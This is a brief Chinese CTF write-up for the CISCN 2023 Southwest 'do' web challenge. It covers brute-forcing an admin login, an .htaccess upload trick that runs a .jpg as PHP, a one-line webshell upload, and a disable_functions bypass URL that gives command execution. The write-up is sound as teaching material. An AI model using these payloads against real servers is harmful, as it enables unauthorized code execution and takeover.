[CISCN 2023 西南]do

CISCN 2023 西南]do"/>

[CISCN 2023 西南]do

打开题目，大概是一个购买书籍的网站，有登陆的功能
我们可以先分析下给的源码
在admin.php中会验证是否为admin用户
我们尝试爆破下密码，爆出来为admin123

登陆后发现存在文件上传漏洞

我们分析下源码
存在文件后缀检测，如果为php相关的后缀将其改为jpg，其他后缀不做修改
那么我们可以尝试.htaccess配置文件攻击
上传.htaccess，写入

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

上传成功后，再上传名为1.jpg的一句话木马
但是蚁剑连接后发现权限不够

我们转换思路，在源码找到利用点
我们可以绕过disable_function造成RCE
修改下路径即可，payload如下

/bootstrap/test/bypass_disablefunc.php?cmd=env&outpath=/var/www/html/bootstrap/1.txt&sopath=/var/www/html/bootstrap/test/bypass_disablefunc_x64.so

得到flag